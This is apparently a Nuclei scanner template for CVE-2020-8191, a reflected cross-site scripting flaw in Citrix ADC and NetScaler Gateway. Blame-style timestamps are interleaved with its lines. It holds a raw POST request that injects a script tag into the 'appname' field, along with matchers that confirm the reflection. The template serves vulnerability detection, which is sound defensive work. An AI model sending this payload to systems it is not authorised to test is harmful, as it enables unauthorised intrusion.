2021-01-02 04:56:15 +00:00
id : CVE-2020-8191
2020-07-11 17:53:33 +00:00
info :
name : Citrix ADC & NetScaler Gateway Reflected XSS
author : dwisiswant0
2021-09-10 11:26:40 +00:00
severity : medium
2021-03-16 15:04:09 +00:00
description : |
Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS).
2022-04-22 10:38:41 +00:00
reference :
- https://support.citrix.com/article/CTX276688
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8191
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,citrix,xss
2020-07-11 17:53:33 +00:00
requests :
- raw :
- |
POST /menu/stapp HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
X-NITRO-USER : xpyZxwy6
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
2021-09-08 12:17:19 +00:00
2020-07-11 17:53:33 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "</title><script>alert(31337)</script>"
part : body
2021-09-08 12:17:19 +00:00
2020-07-11 17:53:33 +00:00
- type : status
status :
- 200
2021-05-05 11:34:46 +00:00
- type : word
words :
- "text/html"
part : header